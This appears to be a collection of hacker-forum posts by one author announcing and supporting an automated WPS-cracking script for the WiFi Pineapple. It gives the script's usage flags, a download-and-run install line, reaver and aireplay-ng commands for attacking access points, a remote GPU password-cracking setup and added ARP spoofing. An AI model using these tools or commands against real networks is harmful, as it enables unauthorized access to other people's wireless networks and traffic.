airman_dopey

Updated to version 1.1. Change log is as follows: - Fixed bug where installing to USB would fail - Added Aireplay-ng and Reaver monitoring. This allows the script to ensure everything is running properly and, if either program fails, causes the script to relaunch the suspect program up to the threshold set in the beginning of the script (currently set to 3) - Added signal checking to discard network if signal strength is below -81 as shown by Wash - Added flag to bypass minimum signal strength check - Added output flag to send a copy of all output to file - Added ability to have second press of WPS button close script gracefully (This function requires the WPS button script to be rewritten by running the install portion of the script). - Added steadily blinking light to signify script is waiting "N" seconds prior to starting attack - Added sanity checks to verify Reaver and Aireplay-ng are installed prior to running - Fixed numerous bugs relating to the overall function of the script If you are upgrading from an older version please make sure you run the install again and overwrite the WPS button script to add the button-cancel function of the script Thank you all who have tried this script. I hope it is useful.

As told in the Wifi Pineapple book found here:https://www.dropbox.com/s/dr6sedfteu8atwq/hak5-mk4-book1e.pdf while in Backtrack (Or Kali) type wget http://wifipineapple.com/mk4/scripts/wp4.sh to download the ICS script, run chmod +x wp4.sh to make executable, then run it as root.

A friend of mine bought the Anker3 and powers the pineapple, powered hub with a USB drive and Alfa NHA card, and a RasPI, and gets approx. 13 hours running off that setup. So yeah, it'll power the USB drive

EDIT 2: Version 1.2 of the script has been release. See post 16 for changes EDIT: Version 1.1 of the script has been release. See 3rd post for changes Hope this is the right section. Hey guys. I was researching Reaver attacks straight from the pineapple and I could not find anything I liked. I wanted something completely automated from the WPS button. Since I couldn't find one I wrote one and thought I'd share. This script attempts a WPS attack utilizing Reaver and the wifi pineapple Usage: ./reaver.sh [-b BSSID] [-d] [-e ESSID] [-f] [-h] [-i location] [-w time] [-o file] [-s] -b BSSID When scanning for networks this BSSID will be attacked regardless of both signal strength and if it was cracked before. (Note: When scanning networks if both ESSID and BSSID are listed the BSSID is used first) -d Debug mode: Prints extra information to help with debugging -e ESSID When scanning for networks this ESSID will be attacked regardless of both signal strength and if it was cracked before. (Note: When scanning networks if both ESSID and BSSID are listed the BSSID is used first) -f Force attack of closest network (override check of previously cracked networks) -h This screen -i Installs Reaver (if missing) and offers to integrate with WPS button. (Requires internet connection) -o file Sends copy of all output to file -s Overrides the minimum signal strength required -w delay wait "N" seconds before beginning attack (The help screen of the script) Basically here's how the script runs: Once you push the WPS button, It will start with phase 1 and blink the light once. During this phase karma will be stopped and the wireless card will be prepped for the attack. Once this is complete the WPS light will blink twice and phase 2 will start. This is where the pineapple will start scanning for networks using wash. First thing that happens is it checks the self-created "cracked.txt" for previously cracked networks and omits them from the scan (unless the -f argument is used). It then checks all the networks seen and, if an ESSID or BSSID was requested it will use that network if visible. If not seen it will attack the network with the strongest signal. Once the network is determined it will switch to phase 3 and the WPS light will blink 3 times. This is where the actual attack starts. Aireplay-ng will attempt to associate with the network and, if successful, Reaver will begin. Once Reaver completes the WPS light will light back up and the network will be saved in the cracked.txt file. If any errors happen throughout the script it will stall out and the WPS light will start flashing off and on. I have really tried to capture all possible errors, but since I cannot foresee all problems if you run into any problems please let me know and I will modify my script. Installation is extremely simple. Just SSH into your pineapple, and while in the "/root" directory (which is the default directory when you SSH in) run ONE of the following commands to install the script: To install Reaver: wget http://hax0rbl0x.googlecode.com/files/reaver.sh; chmod +x reaver.sh; ./reaver.sh -i Once that is installed, follow the post-installation instruction, or if you selected to modify the WPS button functionality, simply press the WPS button. I have tested this using just the Pineapple holiday bundle and it works like a charm. Not only that, but simply using the pineapple juice for power the pineapple was still going 14 hours later. I guess karma really eats up the battery. So just the pineapple juice should be sufficient for any attacks you are trying to accomplish. If for some reason you run out of juice prior to Reaver finishing the attack it will pick up where it left off. Hope you guys like it. Enjoy.

Same issue. Also does not work when using the pineapple juice (which really frustrated me). I feel for you. Very frustrating when you purchasing things from a store expecting them to work with one another and no mention through the store that they do not. The hakshop still doesn't say anything about this issue and it has been reported numerous times in the forums. The lack of communication (or lack of caring, but I am attempting to give the benefit of the doubt) is atrocious.

Output of wash is as follows: BSSID Channel RSSI WPS Version WPS Locked ESSID -------------------------------------------------------------------------------------- XX:XX:XX:XX:XX:XX 11 -52 1.0 No XXXX This is while sitting in the same room as the AP using the alfa panel 7db antenna. So I may have made a small error. When I tried to run aireplay to generate traffic it kept erroring out with a WPA error. But it seems to be case sensitive. When I did my ESSID exactly as listed it was showing as connected. When I tried running reaver in a seperate terminal it started cracking. I will edit this post after a successful test with all the commands I used in order, but it seems to be working now. Thank you for all your help.

And you're using the built in wireless or a seperate card?

Just out of curiosity, did anyone require changing the /etc/config/wireless file prior to making reaver work?

Thank you for your response. I tried following your commands and get the same thing. When I leave wlan0 up the "failed to associate" messages appear approx. once every 10-12 seconds. With having wlan0 down and only mon0 up the failed messages spam every second. With that being said, wash displays the proper APs in my area properly. I think I am going to attempt to reflash my pineapple and start over and see if that makes a difference. *EDIT* Reflashed, did an opkg update, opkg install reaver, and then ran the commands listed above, same thing. Tried bringing wlan0 back up, no change (other than the time between error messages again). *EDIT 2* Tried on a seperate AP and same result.

Has anyone else worked out the "failed to associate" issue with Reaver? I have tried the following: Firmware at 2.8.1 stable Installed the reaver 0.4 module ~In Module~ Stopped wlan0 started wlan0 started mon0 scanned for APs selected my AP (WPS enabled, good signal) Selected auto detect and set channel choices Started attack At this point I get the failed to associate message. So I switched to the CLI via SSH. ~CLI~ ifconfig wlan0 down airmon-ng start wlan0 ifconfig wlan0 up ifconfig mon0 down ifconfig mon0 up reaver -i mon0 -b XX:XX:XX:XX:XX:XX -a -c 11 -vv and I get failed to associate. So I tried using aireplay-ng ~CLI~ aireplay -1 5 (or 120) -a XX:XX:XX:XX:XX:XX -e ESSID mon0 comes back with "could not determine channel". Tried setting channel by dropping wlan0 and changing it using "iw wlan0 set channel 11" and still nothing. Tried doing the same for mon0 but regardless of the interface being up or down the interface states that it is busy when I try to change the channel of mon0. At this point I am completely out of ideas. Any ideas? *edit* I have also tried using the exact same reaver command on my Kali build running side by side and the reaver attack through Kali works fine. So I know my AP is not immune to the attack

Version 1.3 updated, now with Arpspoofing via Ettercap built in. No more need for another script to make it work.

Seeing as this would be used for strictly malicious purposes expect a warning at the very least from the mods. This is a security integrity community, not a group of petty vandals.

Also interested in those scripts if you'd be willing

Open terrain? City? Through buildings? omni or uni directional? There is no "best antenna" and I doubt you're going to get your 3-4 mile range unless you have a very specific scenario in mind.

So are you still intending to release the code for this by chance? I am eager to see how you did the interfacing. THought about doing this for some tools I'm writing and remembered your post.

...with the pineapple plugged into AC to prevent power issues.

Thought I would post my gear as well. -Laptop is an Acer Aspire, nothing fancy, but it has an Atheros chipset for wireless -Pineapple with the travel pack (pineapple juice and case) -A couple of 5db rubber duckie antennas -a 7db Alfa panel antenna -9db antenna found in the HakShop -14.3db yagi cantenna with the vanguard tripod -LAN wiretap -Alfa 036H NIC -Squid hub and misc. dongles/hubs/flash drives etc Something else I cannot easily take pictures of (but can screenshot) is my server that's on 24/7. I host files through it to the house and thought about making it a "cracking rig". So I threw an old GTX285 in it and beefed up the power supply. With that I added GPU cracking to it and wrote some scripts to automate my dictionary/brute force attacks. A simple script on my laptop allows me to check the pcap file and sftp it to my home rig (using dynamic DNS). Once the file transfers to my server I SSH in and load the main menu script. You can see some of the things I have added already. This is the configuration menu where I can pick which wordlists to use. I have over 33 gigs of wordlists stored on the machine. Additionally, I can spawn the processes into the background and let them run by themselves. For notifications I have my rig programmed to text me with status messages (wordlist started, finished, password found/not found). THis way I can be in the field and, once capturing a handshake, forward it on to my rig and go eat some lunch or something while my machine back home does all the heavy lifting. Once the machine finds the info, I receive a text on my phone that looks like this: It's not pretty ATM, but it is extremely functional. I'm looking to add hash cracking and similar tools to it. No point in using my feeble laptop for cracking when I can let full blown desktops do it much much faster.

Try to ssh into the pineapple and cat the file

One hopes that this would be your ip address (although I would not post mine on a "hacking" website) because it would be really shitty if you were advertising a stranger's ip with hardware listed.

This doesn't pass my sniff test....

Link 1: Yes, a higher gain antenna will give you further range, but keep in mind that an omni directional antenna has a donut-shaped range. The higher the gain, the flatter the donut (to the point that even a couple feet higher than the antenna will cause you to have no signal). I am not a radio professional, so I cannot say how the 12db antenna will perform, but I have a 9db one from the hakshop and it works very well. As for the second link, yes, that is the one

I'm assuming killall does not return an error but just fails to kill it? Have you tried a kill -9?

When people won't search through the thread they're in they sure as hell won't search an entire forum. http://forums.hak5.org/index.php?/topic/28275-cannot-upgrade-md5sum-does-not-match/

Ngrep was pulled from the pineapple due to a lack of power. We want tools that allows the pineapple to do what it does best and leave the heavy lifting to ask pi or another computer. Besides, I'd rather be able to do as little or as much as I want for any given attack; not be limited by the hardware.

Most (if not all) of the vulnerabilities discovered and released would have been patched. I think (though correct me if I'm wrong) you want another vulnerability discovered and recorded for your site.